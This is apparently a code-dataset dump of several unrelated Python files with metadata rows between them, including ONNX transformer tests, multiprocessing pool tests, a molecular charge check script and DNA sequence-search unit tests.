spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X)
opset = spd.op_version
self.assertGreater(self.opset(), opset[''])
def test_speedup_transform64_pickle(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.transform(X)
got = spd2.transform(X)
self.assertEqualArray(expected, got)
expected = spd.raw_transform(X)
got = spd2.raw_transform(X)
self.assertEqualArray(expected, got)
def test_speedup_transform64_numpy_pickle(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False,
runtime="numpy")
spd.fit(X)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.transform(X)
got = spd2.transform(X)
self.assertEqualArray(expected, got)
expected = spd.raw_transform(X)
got = spd2.raw_transform(X)
self.assertEqualArray(expected, got)
def test_speedup_transform64_numba_pickle(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False,
runtime="numba")
spd.fit(X)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.transform(X)
got = spd2.transform(X)
self.assertEqualArray(expected, got)
expected = spd.raw_transform(X)
got = spd2.raw_transform(X)
self.assertEqualArray(expected, got)
def test_speedup_transform64_onnx(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X)
expected = spd.transform(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})['variable']
self.assertEqualArray(expected, got)
def test_speedup_transform64_onnx_numpy(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False,
runtime='numpy')
spd.fit(X)
expected = spd.transform(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})['variable']
self.assertEqualArray(expected, got)
def test_speedup_transform64_onnx_numba(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False,
runtime='numba')
spd.fit(X)
expected = spd.transform(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})['variable']
self.assertEqualArray(expected, got)
if __name__ == '__main__':
unittest.main()
| 33.461538 | 70 | 0.587849 | 667 | 6,090 | 5.181409 | 0.14093 | 0.055556 | 0.048611 | 0.055556 | 0.774016 | 0.758391 | 0.758391 | 0.758391 | 0.7364 | 0.735243 | 0 | 0.015858 | 0.30624 | 6,090 | 181 | 71 | 33.646409 | 0.80213 | 0.014286 | 0 | 0.730263 | 0 | 0 | 0.016016 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.092105 | false | 0 | 0.078947 | 0.006579 | 0.184211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bee409ec09959aac70ccb8237e56fe1667419eb1 | 263 | py | Python | datasets/loader/__init__.py | wutong16/Adversarial_Long-Tail | ab2f3a792aede2bd2a3e57657c787ec542165be1 | [
"FSFAP"
] | 78 | 2021-04-05T15:58:03.000Z | 2022-03-30T02:42:42.000Z | datasets/loader/__init__.py | wutong16/Adversarial_Long-Tail | ab2f3a792aede2bd2a3e57657c787ec542165be1 | [
"FSFAP"
] | 1 | 2022-03-08T04:11:02.000Z | 2022-03-18T04:11:17.000Z | datasets/loader/__init__.py | wutong16/Adversarial_Long-Tail | ab2f3a792aede2bd2a3e57657c787ec542165be1 | [
"FSFAP"
] | 9 | 2021-04-13T09:51:51.000Z | 2022-03-09T02:45:20.000Z | from .sampler import GroupSampler, DistributedGroupSampler, DistributedSampler, ClassAwareSampler
from .build_loader import build_dataloader
__all__ = ['GroupSampler', 'DistributedGroupSampler', 'build_dataloader', 'DistributedSampler', 'ClassAwareSampler']
| 52.6 | 117 | 0.828897 | 20 | 263 | 10.55 | 0.55 | 0.331754 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087452 | 263 | 4 | 118 | 65.75 | 0.879167 | 0 | 0 | 0 | 0 | 0 | 0.332046 | 0.088803 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bef073ec8748277f5988dd656aed1e4012dd8587 | 252 | py | Python | nmigen_boards/colorlight_i5.py | hansfbaier/amaranth-boards | a3e92db69e74cc18a42808f6f72068f05efe018e | [
"BSD-2-Clause"
] | 1 | 2022-01-22T20:23:07.000Z | 2022-01-22T20:23:07.000Z | nmigen_boards/colorlight_i5.py | amaranth-community-unofficial/amaranth-boards | eacb18700d0ed97f525737ca80d923ebd5851505 | [
"BSD-2-Clause"
] | null | null | null | nmigen_boards/colorlight_i5.py | amaranth-community-unofficial/amaranth-boards | eacb18700d0ed97f525737ca80d923ebd5851505 | [
"BSD-2-Clause"
] | null | null | null |
from amaranth_boards.colorlight_i5 import *
from amaranth_boards.colorlight_i5 import __all__
import warnings
warnings.warn("instead of nmigen_boards.colorlight_i5, use amaranth_boards.colorlight_i5",
DeprecationWarning, stacklevel=2)
| 28 | 90 | 0.809524 | 31 | 252 | 6.193548 | 0.516129 | 0.333333 | 0.375 | 0.40625 | 0.375 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0.022936 | 0.134921 | 252 | 8 | 91 | 31.5 | 0.857798 | 0 | 0 | 0 | 0 | 0 | 0.290837 | 0.227092 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8360b50f91e82a0d5fee0a38f6990a31553fc32f | 72 | py | Python | py_tdlib/constructors/chat_members_filter_banned.py | Mr-TelegramBot/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 24 | 2018-10-05T13:04:30.000Z | 2020-05-12T08:45:34.000Z | py_tdlib/constructors/chat_members_filter_banned.py | MrMahdi313/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 3 | 2019-06-26T07:20:20.000Z | 2021-05-24T13:06:56.000Z | py_tdlib/constructors/chat_members_filter_banned.py | MrMahdi313/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 5 | 2018-10-05T14:29:28.000Z | 2020-08-11T15:04:10.000Z | from ..factory import Type
class chatMembersFilterBanned(Type):
pass
| 12 | 36 | 0.791667 | 8 | 72 | 7.125 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138889 | 72 | 5 | 37 | 14.4 | 0.919355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
8362dfe4ca13727fd2af4c0f69bc5560e5277526 | 231 | py | Python | board/imx6sl/ucube.py | jinlongliu/AliOS-Things | ce051172a775f987183e7aca88bb6f3b809ea7b0 | [
"Apache-2.0"
] | 4 | 2019-03-12T11:04:48.000Z | 2019-10-22T06:06:53.000Z | board/imx6sl/ucube.py | IamBaoMouMou/AliOS-Things | 195a9160b871b3d78de6f8cf6c2ab09a71977527 | [
"Apache-2.0"
] | 3 | 2018-12-17T13:06:46.000Z | 2018-12-28T01:40:59.000Z | board/imx6sl/ucube.py | IamBaoMouMou/AliOS-Things | 195a9160b871b3d78de6f8cf6c2ab09a71977527 | [
"Apache-2.0"
] | 2 | 2018-01-23T07:54:08.000Z | 2018-01-23T11:38:59.000Z | linux_only_targets="blink bluetooth.ble_bqb netmgrapp bluetooth.blemesh_srv bluetooth.blemesh uDataapp bluetooth.blemesh_cli bluetooth.bleadv wifihalapp hdlcapp.hdlcserver acapp helloworld bluetooth.bleperipheral helloworld_nocli"
| 115.5 | 230 | 0.896104 | 28 | 231 | 7.178571 | 0.714286 | 0.238806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 231 | 1 | 231 | 231 | 0.926267 | 0 | 0 | 0 | 0 | 1 | 0.904762 | 0.281385 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
55c4f4dd136a61fc9c07b3ae15653490c12f66f5 | 1,836 | py | Python | docking/test_Cornell.py | thenlevy/docking_project | 8f0acfa44d57d466e119872cb0f099de7dc85423 | [
"MIT"
] | 1 | 2018-04-09T12:15:41.000Z | 2018-04-09T12:15:41.000Z | docking/test_Cornell.py | thenlevy/docking_project | 8f0acfa44d57d466e119872cb0f099de7dc85423 | [
"MIT"
] | null | null | null | docking/test_Cornell.py | thenlevy/docking_project | 8f0acfa44d57d466e119872cb0f099de7dc85423 | [
"MIT"
] | null | null | null | from Cornell import Cornell_calc
from parser_pdb import parse_pdb
from structureToolsProjPython import preparePDB
official = preparePDB("../data/ex.pdb", "D")
test = Cornell_calc(parse_pdb("../data/ex.pdb"))
for chain in official["chains"]:
for curres in official[chain]["reslist"]:
for atomtype in official[chain][curres]["atomlist"]:
atom = official[chain][curres][atomtype]
id_at = int(atom['id']) - 1
if atom["charge"] != test.get_q(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "charge")
print(id_at)
if atom["vdw"] != test.get_r(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "vdw")
print(id_at)
if atom["epsilon"] != test.get_epsilon(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "epsilon")
print(id_at)
official = None
official = preparePDB("../data/Lig_natif.pdb", "D")
test = Cornell_calc(parse_pdb("../data/Lig_natif.pdb"))
id_at = 0
for chain in official["chains"]:
for curres in official[chain]["reslist"]:
for atomtype in official[chain][curres]["atomlist"]:
atom = official[chain][curres][atomtype]
if atom["charge"] != test.get_q(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "charge")
print(id_at)
if atom["vdw"] != test.get_r(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "vdw")
print(id_at)
if atom["epsilon"] != test.get_epsilon(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "epsilon")
print(id_at)
assert(False)
id_at += 1
| 43.714286 | 87 | 0.581699 | 221 | 1,836 | 4.696833 | 0.190045 | 0.057803 | 0.183044 | 0.086705 | 0.791908 | 0.791908 | 0.791908 | 0.791908 | 0.732177 | 0.732177 | 0 | 0.002222 | 0.264706 | 1,836 | 41 | 88 | 44.780488 | 0.766667 | 0 | 0 | 0.684211 | 0 | 0 | 0.120915 | 0.022876 | 0 | 0 | 0 | 0 | 0.026316 | 1 | 0 | false | 0 | 0.078947 | 0 | 0.078947 | 0.315789 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
55db9b1436b009d05084d9b0d0c06ad3f6981146 | 13,193 | py | Python | test/parallel/test_pool.py | lorenzosteccanella/machin | 9d3ce87dbed820b5019211b0690b54613084d9e4 | [
"MIT"
] | 287 | 2020-06-13T05:19:50.000Z | 2022-03-31T04:46:32.000Z | test/parallel/test_pool.py | lorenzosteccanella/machin | 9d3ce87dbed820b5019211b0690b54613084d9e4 | [
"MIT"
] | 19 | 2020-08-19T05:33:45.000Z | 2022-03-27T15:16:03.000Z | test/parallel/test_pool.py | lorenzosteccanella/machin | 9d3ce87dbed820b5019211b0690b54613084d9e4 | [
"MIT"
] | 44 | 2020-07-06T00:41:44.000Z | 2022-03-29T17:05:08.000Z | from logging import DEBUG
from machin.parallel.pool import Pool, P2PPool, CtxPool, ThreadPool, CtxThreadPool
from machin.utils.logging import default_logger as logger
from test.util_fixtures import *
from test.util_platforms import linux_only
import dill
import pytest
import torch as t
# enable pool logging
logger.setLevel(DEBUG)
def init_func(*_):
print("Hello")
def func(x):
return t.sum(x * 2)
def func2(x, y):
return t.sum(x + y)
class TestPool:
pool_impl = Pool
def test_apply(self):
pool = self.pool_impl(processes=2)
x = t.ones([10])
assert pool.apply(func, (x,)) == 20
# for pytest-cov to run on sub processes
pool.close()
pool.join()
def test_apply_async(self):
pool = self.pool_impl(processes=2)
x = t.ones([10])
assert pool.apply_async(func, (x,)).get() == 20
pool.close()
pool.join()
def test_map(self):
pool = self.pool_impl(processes=2)
x = [t.ones([10]) * i for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(pool.map(func, x), [0, 20, 40, 60, 80])
)
pool.close()
pool.join()
def test_map_async(self):
pool = self.pool_impl(processes=2)
x = [t.ones([10]) * i for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(
pool.map_async(func, x).get(), [0, 20, 40, 60, 80]
)
)
pool.close()
pool.join()
def test_imap(self):
pool = self.pool_impl(processes=2)
x = [t.ones([10]) * i for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(pool.imap(func, x), [0, 20, 40, 60, 80])
)
pool.close()
pool.join()
def test_imap_unordered(self):
pool = self.pool_impl(processes=2)
x = [t.ones([10]) * i for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(
sorted(pool.imap_unordered(func, x)), [0, 20, 40, 60, 80]
)
)
pool.close()
pool.join()
def test_starmap(self):
pool = self.pool_impl(processes=2)
x = [(t.ones([10]) * i, t.ones([10]) * i) for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(pool.starmap(func2, x), [0, 20, 40, 60, 80])
)
pool.close()
pool.join()
def test_starmap_async(self):
pool = self.pool_impl(processes=2)
x = [(t.ones([10]) * i, t.ones([10]) * i) for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(
pool.starmap_async(func2, x).get(), [0, 20, 40, 60, 80]
)
)
pool.close()
pool.join()
# Disabled for now
# Individual testing passes while testing with all other module fails with:
# Traceback (most recent call last):
# File "/opt/conda/lib/python3.7/multiprocessing/process.py", line 297,
# in _bootstrap
# self.run()
# File "/opt/conda/lib/python3.7/multiprocessing/process.py", line 99, in run
# self._target(*self._args, **self._kwargs)
# File "/opt/conda/lib/python3.7/site-packages/torch/multiprocessing/pool.py",
# line 9, in clean_worker
# multiprocessing.pool.worker(*args, **kwargs)
# File "/opt/conda/lib/python3.7/multiprocessing/pool.py", line 110, in worker
# task = get()
# File "/var/lib/jenkins/workspace/machin_master_2/machin/parallel/queue.py",
# line 112, in get
# return loads(res)
# File "/opt/conda/lib/python3.7/site-packages/dill/_dill.py", line 283, in loads
# return load(file, ignore, **kwds)
# File "/opt/conda/lib/python3.7/site-packages/dill/_dill.py", line 278, in load
# return Unpickler(file, ignore=ignore, **kwds).load()
# File "/opt/conda/lib/python3.7/site-packages/dill/_dill.py", line 481, in load
# obj = StockUnpickler.load(self)
# File "/opt/conda/lib/python3.7/site-packages/torch/multiprocessing
# /reductions.py", line 117, in rebuild_cuda_tensor
# event_sync_required)
# RuntimeError: CUDA error: peer access is not supported between these two devices
# def test_gpu_tensor(self, gpu):
# x = [
# t.ones([10], device=gpu) * i
# for i in range(5)
# ]
# logger.info("GPU tensors created.")
# pool = self.pool_impl(processes=2, is_copy_tensor=True)
# logger.info("Pool 1 created.")
# assert all(
# out == expect_out
# for out, expect_out in zip(pool.map(func, x), [0, 20, 40, 60, 80])
# )
# pool.close()
# pool.join()
# logger.info("Pool 1 joined.")
#
# pool = self.pool_impl(processes=2, is_copy_tensor=False, share_method="cuda")
# logger.info("Pool 2 created.")
# assert all(
# out == expect_out
# for out, expect_out in zip(pool.map(func, x), [0, 20, 40, 60, 80])
# )
# pool.close()
# pool.join()
# logger.info("Pool 2 joined.")
@linux_only
def test_cpu_shared_tensor(self):
x = [t.ones([10]) * i for i in range(5)]
for xx in x:
xx.share_memory_()
logger.info("CPU tensors created.")
pool = self.pool_impl(processes=2, is_copy_tensor=False, share_method="cpu")
logger.info("Pool created.")
assert all(
out == expect_out
for out, expect_out in zip(pool.map(func, x), [0, 20, 40, 60, 80])
)
pool.close()
pool.join()
logger.info("Pool joined.")
def test_lambda_and_local(self):
x = [t.ones([10]) * i for i in range(5)]
y = t.ones([10])
x2 = [(t.ones([10]) * i, t.ones([10]) * i) for i in range(5)]
def local_func(xx):
nonlocal y
return t.sum(xx + y)
pool = self.pool_impl(processes=2, is_recursive=True)
assert all(
out == expect_out
for out, expect_out in zip(pool.map(local_func, x), [10, 20, 30, 40, 50])
)
assert all(
out == expect_out
for out, expect_out in zip(
pool.map(lambda xx: t.sum(xx[0] + xx[1]), x2), [0, 20, 40, 60, 80]
)
)
pool.close()
pool.join()
pool = self.pool_impl(processes=2)
assert all(
out == expect_out
for out, expect_out in zip(pool.map(func, x), [0, 20, 40, 60, 80])
)
pool.close()
pool.join()
def test_size(self):
pool = self.pool_impl(processes=2)
assert pool.size() == 2
pool.close()
pool.join()
def test_reduce(self):
with pytest.raises(NotImplementedError, match="cannot be passed"):
dill.dumps(Pool(processes=2))
class TestP2PPool(TestPool):
pool_impl = P2PPool
def ctx_func(ctx, x):
# pretend to have done something using x wih context ctx
return ctx, x
def ctx_func2(ctx, x, y):
# pretend to have done something using x and y wwih context ctx
return ctx, x + y
class TestCtxPool:
def test_init(self):
with pytest.raises(ValueError, match="not equal to the number"):
_ = CtxPool(processes=2, worker_contexts=[0, 1, 2, 3])
pool = CtxPool(processes=2, initializer=init_func, initargs=("some_args",))
pool.close()
pool.join()
pool = CtxPool(processes=2, worker_contexts=[0, 1])
pool.close()
pool.join()
def test_ctx_map(self):
pool = CtxPool(processes=2, worker_contexts=[0, 1])
# make sure both workers will have items
x = [i for i in range(10)]
result = pool.map(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_ctx_starmap(self):
pool = CtxPool(processes=2, worker_contexts=[0, 1])
# make sure both workers will have items
xy = [(i, i) for i in range(10)]
result = pool.starmap(ctx_func2, xy)
assert sorted([r[1] for r in result]) == [i * 2 for i in range(10)]
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_multiple_ctx_map(self):
# test whether two context pools will interfere with each other
pool = CtxPool(processes=2, worker_contexts=[0, 1])
pool2 = CtxPool(processes=2, worker_contexts=[2, 3])
# create enough work items so that the execution period of two pools
# will overlap
x = [i for i in range(50000)]
result = pool.map(ctx_func, x)
result2 = pool2.map(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
assert sorted([r[1] for r in result2]) == x
assert {r[0] for r in result2}.issubset({2, 3})
pool.close()
pool.join()
pool2.close()
pool2.join()
class TestThreadPool:
def test_size(self):
pool = ThreadPool(processes=2)
assert pool.size() == 2
pool.close()
pool.join()
def test_reduce(self):
with pytest.raises(NotImplementedError, match="cannot be passed"):
dill.dumps(ThreadPool(processes=2))
class TestCtxThreadPool:
def test_init(self):
with pytest.raises(ValueError, match="not equal to the number"):
_ = CtxThreadPool(processes=2, worker_contexts=[0, 1, 2, 3])
pool = CtxThreadPool(
processes=2, initializer=init_func, initargs=("some_args",)
)
pool.close()
pool.join()
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
pool.close()
pool.join()
def test_apply(self):
pool = CtxThreadPool(processes=2)
assert pool.apply(ctx_func, (1,))[1] == 1
# for pytest-cov to run on sub processes
pool.close()
pool.join()
def test_apply_async(self):
pool = CtxThreadPool(processes=2)
assert pool.apply_async(ctx_func, (1,)).get()[1] == 1
pool.close()
pool.join()
def test_map(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
x = [i for i in range(10)]
result = pool.map(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_map_async(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
x = [i for i in range(10)]
result = pool.map_async(ctx_func, x).get()
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_imap(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
x = [i for i in range(10)]
result = pool.imap(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_imap_unordered(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
x = [i for i in range(10)]
result = pool.imap_unordered(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_starmap(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
xy = [(i, i) for i in range(10)]
result = pool.starmap(ctx_func2, xy)
assert sorted([r[1] for r in result]) == [i * 2 for i in range(10)]
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_starmap_async(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
xy = [(i, i) for i in range(10)]
result = pool.starmap_async(ctx_func2, xy).get()
assert sorted([r[1] for r in result]) == [i * 2 for i in range(10)]
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_multiple_ctx_map(self):
# test whether two context thread pools will interfere with each other
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
pool2 = CtxThreadPool(processes=2, worker_contexts=[2, 3])
# create enough work items so that the execution period of two pools
# will overlap
x = [i for i in range(50000)]
result = pool.map(ctx_func, x)
result2 = pool2.map(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
assert sorted([r[1] for r in result2]) == x
assert {r[0] for r in result2}.issubset({2, 3})
pool.close()
pool.join()
pool2.close()
pool2.join()
| 33.065163 | 87 | 0.564542 | 1,865 | 13,193 | 3.903485 | 0.124397 | 0.050824 | 0.055357 | 0.07239 | 0.781868 | 0.768819 | 0.767033 | 0.727885 | 0.702473 | 0.681044 | 0 | 0.042676 | 0.301978 | 13,193 | 398 | 88 | 33.148241 | 0.747855 | 0.200864 | 0 | 0.701439 | 0 | 0 | 0.01422 | 0 | 0 | 0 | 0 | 0 | 0.143885 | 1 | 0.122302 | false | 0.007194 | 0.028777 | 0.014388 | 0.194245 | 0.003597 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
55f57765b835e2c3bcb85c6d0d13e4704d963574 | 5,576 | py | Python | tests/test_sequence_searches.py | GeoffSCollins/PolTools | 1ea9b166efc56610c385802f9491b4c8ec25a1d0 | [
"MIT"
] | null | null | null | tests/test_sequence_searches.py | GeoffSCollins/PolTools | 1ea9b166efc56610c385802f9491b4c8ec25a1d0 | [
"MIT"
] | null | null | null | tests/test_sequence_searches.py | GeoffSCollins/PolTools | 1ea9b166efc56610c385802f9491b4c8ec25a1d0 | [
"MIT"
] | null | null | null | import unittest.mock
from pathlib import Path
from PolTools.main_programs import sequence_searches
from PolTools.main_programs.sequence_searches import InvalidSearchException
import io
from quieter import Quieter
class TestSequenceSearches(unittest.TestCase):
polr2a_region_file = str(Path(__file__).parent) + "/test_files/POLR2A_inr.bed"
# Has the sequence "CGAGTTCGCT GCTCAGAAGC" (+1 on right side of space)
ccnt1_region_file = str(Path(__file__).parent) + "/test_files/CCNT1_inr.bed"
# Has the sequence "AAGTGCCTGC AGCCTTCGCC" (+1 on right side of space)
def _parse_stdoutput(self, output):
# Returns the True or False value of the test
return output.split("\n")[1].split()[-1]
def test_no_arguments(self):
# Should print the usage
with self.assertRaises(SystemExit):
with Quieter():
sequence_searches.parse_input([])
def test_only_regions_file(self):
# Should print the usage
with self.assertRaises(SystemExit):
with Quieter():
sequence_searches.parse_input([self.polr2a_region_file])
def test_incorrect_search(self):
# Should raise an InvalidSearch error because of the underscore
with self.assertRaises(InvalidSearchException):
with Quieter():
sequence_searches.parse_input([self.polr2a_region_file, 'TATA,-5_7'])
def test_search_not_in_region(self):
# Should raise an InvalidSearch error because polr2a file is -10 to +10
with self.assertRaises(InvalidSearchException):
with Quieter():
sequence_searches.parse_input([self.polr2a_region_file, 'TATA,-20:-10'])
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_one_upstream_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'TTT,-10:-5'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_one_upstream_sequence_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'CGAGT,-10:-5'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_one_upstream_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'TTT,-10:-5'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_one_upstream_sequence_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'AAGTG,-10:-5'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_one_downstream_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'TTT,5:10'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_one_downstream_sequence_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'GAAGC,5:10'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_one_downstream_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'TTT,5:10'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_one_downstream_sequence_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'TCGCC,5:10'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_inr_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'TTT,-3:3'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_positive_strand_inr_sequence_found(self, mock_stdout):
sequence_searches.main([self.polr2a_region_file, 'GCTGCT,-3:3'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_inr_sequence_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'TTT,-3:3'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "False")
@unittest.mock.patch('sys.stdout', new_callable=io.StringIO)
def test_negative_strand_inr_sequence_not_found(self, mock_stdout):
sequence_searches.main([self.ccnt1_region_file, 'TGCAGC,-3:3'])
output = self._parse_stdoutput(mock_stdout.getvalue())
self.assertEqual(output, "True")
if __name__ == '__main__':
unittest.main()
